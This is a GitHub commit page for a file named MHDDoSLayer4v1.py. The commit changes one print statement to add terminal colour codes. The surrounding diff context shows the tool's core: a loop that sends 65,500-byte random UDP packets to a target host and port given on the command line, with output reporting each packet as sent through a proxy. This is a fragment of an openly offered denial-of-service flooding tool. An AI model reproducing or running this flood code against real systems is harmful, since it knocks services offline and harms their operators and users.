Update MHDDoSLayer4v1.py

This commit is contained in:
MHProDev 2020-10-23 02:35:29 +03:30 committed by GitHub
parent feefa5f378
commit 25990f035a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -57,7 +57,7 @@ def main():
else:
port = int(sys.argv[2])
sock.sendto(random._urandom(65500),(str(sys.argv[1]),int(port)))
print(randoms,"| \033[97m[\033[92m!\033[97m] \033[97mPacket Sended By\033[96m", str(proxy.rstrip("\n\r")))
print(' \033[92m',randoms,"| \033[97m[\033[92m!\033[97m] \033[97mPacket Sended By\033[96m", str(proxy.rstrip("\n\r")))
except socket.error:
sock.sendto(random._urandom(65500),(str(sys.argv[1]),int(port)))
except socket.timeout: